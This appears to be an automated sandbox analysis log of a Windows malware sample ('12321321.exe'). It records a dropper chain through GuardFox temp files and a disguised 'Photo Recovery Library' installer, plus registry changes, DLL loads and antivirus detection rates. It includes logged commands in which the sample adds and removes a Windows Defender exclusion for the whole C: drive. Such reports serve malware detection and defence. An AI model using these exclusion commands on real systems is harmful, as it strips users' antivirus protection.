            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8692:120:WilError_03
            Source: C:\Users\user\Desktop\12321321.exeFile created: C:\Users\user\AppData\Local\Temp\GuardFoxJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
            Source: photorecoverylib.exe, photorecoverylib.exe, 0000000A.00000002.2565302518.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.10.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: photorecoverylib.exe, 0000000A.00000002.2565302518.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.10.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: photorecoverylib.exe, photorecoverylib.exe, 0000000A.00000002.2565302518.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.10.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
            Source: photorecoverylib.exe, 0000000A.00000002.2565302518.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.10.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
            Source: photorecoverylib.exe, 0000000A.00000002.2565302518.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.10.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: photorecoverylib.exe, 0000000A.00000002.2565302518.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.10.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: photorecoverylib.exe, 0000000A.00000002.2565302518.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.10.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: photorecoverylib.exe, 0000000A.00000002.2565302518.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.10.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: photorecoverylib.exe, 0000000A.00000002.2565302518.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.10.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: photorecoverylib.exe, 0000000A.00000002.2565302518.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.10.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: photorecoverylib.exe, 0000000A.00000002.2565302518.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.10.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: photorecoverylib.exe, photorecoverylib.exe, 0000000A.00000002.2565302518.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.10.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: 12321321.exeReversingLabs: Detection: 76%
            Source: 12321321.exeVirustotal: Detection: 73%
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
            Source: unknownProcess created: C:\Users\user\Desktop\12321321.exe "C:\Users\user\Desktop\12321321.exe"
            Source: C:\Users\user\Desktop\12321321.exeProcess created: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe "C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe"
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\12321321.exeProcess created: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exe "C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exe"
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp "C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp" /SL5="$5029E,4337550,56832,C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpProcess created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe "C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe" -i
            Source: C:\Users\user\Desktop\12321321.exeProcess created: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe "C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe"Jump to behavior
            Source: C:\Users\user\Desktop\12321321.exeProcess created: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exe "C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp "C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp" /SL5="$5029E,4337550,56832,C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpProcess created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe "C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe" -iJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: msacm32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
